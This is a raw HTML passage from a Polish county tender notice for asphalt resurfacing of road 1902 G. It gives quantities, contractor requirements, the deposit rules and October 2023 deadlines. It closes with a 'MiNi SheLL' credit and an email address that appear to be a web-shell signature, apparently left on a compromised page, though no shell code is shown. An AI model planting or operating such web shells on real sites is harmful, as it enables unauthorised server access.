bitumicznej <br/>- wykonanie koryta pod warstwy bitumiczne<br/>- mechaniczne oczyszczenie warstw konstrukcyjnych<br/>- skropienie warstw konstrukcyjnych emulsją asfaltową <br/>- wykonanie warstwy wiążącej z mieszanki mineralno-asfaltowej<br/>- wykonanie warstwy ścieralnej z mieszanki SMA8<br/>- uzupełnienie i profilowanie poboczy z destruktu bitumicznego (po wcześniejszej ścince poboczy)<br/>Przedmiar robót:<br/>I. droga 1902 G odc. Tuchom – Barniewice, dł. 2+802 do 3 + 502, 700 m pow. 3500 m 2 :<br/>1)	Frezowanie istniejącej nawierzchni bitumicznej gr. 4 cm na włą-czeniu	m2	10,0 ;<br/>2)	Oczyszczenie warstw konstrukcyjnych mechanicznie	m2	3000,0 ;<br/>3)	Skropienie warstw konstrukcyjnych emulsją asfaltową	m2	3000,0 ;<br/>4)	Wykonanie warstwy wiążącej z grub. 3 cm o uziarnieniu AC11 m2	3000,0 ;<br/>5)	Wykonanie warstwy ścieralnej grub. 4 cm SMA8	m2	3000,0 ;<br/>6)	Koryto pod nawierzchnię gr 6 cm	m2	3000,0 ;<br/>7)	Warstwa podbudowy z betonu asfaltowym AC11 śr. 4 cm	m2	0,0 ;<br/>8)	Uzupełnienie i profilowanie poboczy z kruszywa uzyskanego z koryta stabilizowanego mechanicznie m2	800,0 .<br/><br/>WARUNKI WYKONANIA I UWAGI KOŃCOWE<br/>1.	W przypadku napotkania w trakcie wykonywania robót uzbrojenia nie wykazane w inwentaryzacji, należy napotkane uzbrojenie traktować jako czynne, zabezpieczyć je i powiadomić odpowiedniego właściciela lub użytkownika.<br/>2. Wykonawca po zakończeniu prac musi uporządkować teren robót.<br/>3.	Zaleca się, aby wykonawca zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy. Każdy z wykonawców ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji zamówienia.<br/>4.	Do obowiązków Wykonawcy należy opracowanie i wprowadzenie czasowej organizacji ruchu na czas realizacji robót drogowych będących przedmiotem zamówienia – projekt należy zaopiniować w Zarządzie Dróg Powiatowych w Kartuzach i Komendzie Powiatowej Policji w Kartuzach a następnie uzyskać zatwierdzenie z Wydziału Komunikacji Starostwa Powiatowego w Kartuzach<br/>5.	Wykonawca jest odpowiedzialny za całokształt, w tym za przebieg oraz terminowe wykonanie przedmiotu zamówienia. Wymagana jest należyta staranność przy realizacji zobowiązań umowy.<br/>6.	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy.<br/>7.	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.<br/>8.	Materiały i urządzenia niezbędne do realizacji prac zapewnia Wykonawca.<br/><br/>Prace należy wykonać w oparciu o specyfikacje techniczne stanowiące załącznik nr 1a do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp do wysokości 100 % wartości zamówienia podstawowego (dotyczy obu części zamówienia) w zakresie wykonania podobnych robót budowlanych, co w przedmiotowym postępowaniu. Zakres zamówienia podobnego obejmuje wykonanie odpowiednio odnowy dla 1 części zamówienia lub przebudowy dla 2 części zamówienia nawierzchni bitumicznych na drogach powiatowych Powiatu Kartuskiego zgodnie z przedmiotem niniejszego zamówienia.<br/><br/>Warunki udzielenia zamówienia podobnego, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp:<br/><br/>1)	Wykonawca wykonał lub wykonuje należycie zamówienie podstawowe,<br/>2)	Wykonawca zapewni wykonanie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp w standardzie nie gorszym niż przyjęty do wykonania zamówienia podstawowego.<br/>3)	W ramach prowadzonych negocjacji, Zamawiający i Wykonawca dojdą do porozumienia odnośnie ceny i terminu wykonania.<br/>4)	Istotne postanowienia umowy o udzielenie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, inne niż określone w pkt. 3 powyżej, będą zgodne z istotnymi postanowieniami umowy zawartymi w umowie dla zamówienia podstawowego.<br/>5)	Szacunkowe przedmiary robót dla zamówień podobnych:<br/>b.	dla części 2 zamówienia:<br/>droga 1902 G 700 m :<br/>1	Frezowanie istniejącej nawierzchni bitumicznej gr. 4 cm na włączeniu	m2	10,0 ;<br/>2	Oczyszczenie warstw konstrukcyjnych mechanicznie	m2	3000,0 ;<br/>3	Skropienie warstw konstrukcyjnych emulsją asfaltową	m2	3000,0 ;<br/>4	Wykonanie warstwy wiążącej z grub. 3 cm o uziarnieniu AC11 m2	3000,0 ;<br/>5	Wykonanie warstwy ścieralnej grub. 4 cm SMA8	m2	3000,0 ;<br/>6	Koryto pod nawierzchnię gr 6 cm	m2	3000,0 ;<br/>7	Warstwa podbudowy z betonu asfaltowym AC11 śr. 4 cm	m2	0,0 ;<br/>8	Uzupełnienie i profilowanie poboczy z kruszywa uzyskanego z koryta stabilizowanego mechanicznie m2	800,0 .</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający za najkorzystniejszą uzna ofertę niepodlegającą odrzuceniu, która uzyska największą liczbę punktów obliczona w oparciu o podane kryteria oceny ofert przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek zdolności technicznej lub zawodowej: <br/><br/>a)	Wykonawcy <br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/><br/>w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, zrealizował (zakończył) co najmniej dwie roboty budowlane polegające na budowie/przebudowie/rozbudowie/remoncie(odnowie) dróg w technologii wykonania nawierzchni bitumicznych o łącznej wartości nie mniejszej niż 400.000,00 zł brutto wraz z potwierdzeniem, iż roboty te zostały wykonane należycie zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. <br/><br/>Jako wykonanie / zakończenie roboty budowlanej należy rozumieć podpisanie protokołu odbioru robót bez usterek/po usunięciu wad i usterek lub równoważnego dokumentu. <br/><br/>Warunek wspólny dla obu części zamówienia. W przypadku złożenia oferty na obie części zamówienia, wystarczy jednokrotne spełnienie powyższego warunku. <br/><br/>b) Osób:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/><br/>dysponuje co najmniej jedną osobą, skierowaną przez wykonawcę do realizacji zamówienia publicznego, odpowiedzialną za kierowanie robotami budowlanymi legitymującą się uprawnieniami, doświadczeniem i kwalifikacjami zawodowymi określonymi poniżej:<br/><br/>Funkcja: Kierownik budowy<br/>Minimalne doświadczenie i kwalifikacje zawodowe:<br/>1. Kwalifikacje zawodowe:<br/>Osoba ta, posiada uprawnienia do kierowania robotami budowlanymi w specjalności drogowej.	<br/>2. Doświadczenie:<br/>Osoba ta, pełniła funkcję kierownika budowy lub kierownika robót branży drogowej nad co najmniej 2. robotami budowlanymi polegającymi na budowie/przebudowie/rozbudowie/remoncie (odnowie) dróg w technologii wykonania nawierzchni bitumicznych o łącznej wartości nie mniejszej niż: 400.000 zł. brutto.<br/><br/>Warunek wspólny dla obu części zamówienia. W przypadku złożenia oferty na obie części zamówienia, wystarczy jednokrotne spełnienie powyższego warunku.<br/><br/>Wskazane osoby muszą posiadać uprawnienia budowlane zgodne z ustawą z dnia 7 lipca 1994r. Prawo budowlane (t.j. Dz. U. z 2023 r. poz. 682 z późn. zm.). Dopuszcza się ważne i odpowiadające im uprawnienia nadane na podstawie wcześniej obowiązujących przepisów. <br/><br/>Ponadto wskazane osoby muszą być zrzeszone we właściwych branżowo izbach samorządów zawodowych zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (t.j. Dz. U. z 2023 r. poz. 551).<br/><br/>Niezależnie od powyższych wymagań, celem zapewnienia należytego wykonania roboty budowlanej Wykonawca zapewni w ramach zamówienia wykonanie robót branżowych przez osoby posiadające odpowiednie kwalifikacje i uprawnienia budowlane na podstawie obowiązujących przepisów. Nie wymaga się przedłożenia w ofercie informacji o osobach na stanowiska inne aniżeli pełniącej funkcję: kierownika budowy. <br/><br/>c) Sprzętu<br/><br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował minimum :<br/><br/>- 1 rozkładarką mas bitumicznych, <br/>- 1 walcem ogumionym,<br/>- 1 walcem stalowym,<br/>- 1 frezarką do nawierzchni bitumicznych, <br/>- 1 samochodem samowyładowczym.<br/><br/>Warunek wspólny dla obu części zamówienia. W przypadku złożenia oferty na obie części zamówienia, wystarczy jednokrotne spełnienie powyższego warunku. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty (załącznik nr 5 do SWZ);<br/>b) Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacja o podstawie do dysponowania tymi osobami ( załącznik nr 6 do SWZ).<br/>c) Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami (załącznik nr 7 do SWZ)</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a) na wezwanie Zamawiającego - oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp i art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 18.1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty poprzez wniesienie wadium w wysokości:<br/> 1) w zakresie części 1: 5.000,00 zł. (słownie: pięć tysięcy złotych 00/100). <br/> 2) w zakresie części 2: 3.000,00 zł. (słownie: trzy tysiące złotych 00/100). <br/>18.2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwalnie do dnia upływu terminu związania ofertą.<br/>18.3. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>18.4. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu; <br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>18.5. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy za-mawiającego nr 59 1020 1866 0000 1102 0002 6989, z podaniem tytułu „Wadium – Wykonanie odnowy/przebudowy nawierzchni bitumicznych na drogach powiatowych Powiatu Kartuskiego, CZĘŚĆ …. ”. <br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>Wadium w pieniądzu należy wnosić ściśle z dyspozycją art. 97 ust. 8 ustawy Prawo zamówień publicznych, tzn. „przelewem na rachunek bankowy wskazany przez zamawiającego”. <br/>W myśl art. 63. ust. 3 pkt.1 ustawy Prawo bankowe z dnia 29 sierpnia 1997(t.j. Dz.U. z 2022 r., poz. 2324 ze zm.) polecenie przelewu jest jedną z form rozliczenia bezgotówkowego. Zgodnie z art. 63c Prawa bankowego polecenie przelewu stanowi udzieloną bankowi dyspozycję dłużnika obciążenia jego rachunku określoną kwotą i uznania tą kwotą rachunku wierzyciela. Oznacza to, że wpłata gotówkowa wadium wnoszona na poczcie lub w banku nie stanowi polecenia przelewu w rozumieniu wyżej cytowanych artykułów.<br/>18.6. Wadium wnoszone w formie gwarancji lub poręczenia musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie p.z.p.;<br/>2)	z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>5)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6)	beneficjentem poręczenia lub gwarancji jest: Powiat Kartuski – Zarząd Dróg Powiatowych w Kartuzach<br/>7)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 p.z.p.), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>18.7.	Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 p.z.p. zostanie odrzucona.<br/>18.8. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 p.z.p. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,żaden z nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, natomiast spełnianie warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z zapisami SWZ do niniejszego postępowania . <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dopuszczalne zmiany umowy oraz określenie warunków zmian, zostało zawarte w SWZ - ROZDZIAŁ V : wzór umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-02 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">oferty powinny być złożone za pośrednictwem Platformy zakupowej https://platformazakupowa.pl/pn/zdp_kartuzy</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-02 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-31</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> UWAGA: Wraz z ofertą należy złożyć:<br/>1. Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy lub podmiotu udostępniającego zasoby - jeśli dotyczy;<br/>2. Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia (np. umowa o współdziałaniu). Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy - jeśli dotyczy;<br/>3. Zobowiązania wymagane postanowieniami pkt. 10.3. SWZ, w przypadku gdy Wykonawca polega na zdolnościach podmiotów udostępniających zasoby w celu potwierdzenia spełniania warunków udziału w postępowaniu wraz z pełnomocnictwami - jeśli dotyczy;<br/>4. Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którym mowa w art. 117 ust. 4 ustawy Pzp -jeśli dotyczy;<br/>5. Oświadczenie wymagane postanowieniami pkt. 9.2., 10.9. i 12.3. SWZ.<br/>6. Oświadczenie o niepodleganiu wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego – załącznik nr 2a do SWZ.<br/>W celu potwierdzenia braku podstaw wykluczenia z udziału w postępowaniu o udzielenie zamówienia Wykonawca składa:<br/>a) na wezwanie Zamawiającego - oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp i w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com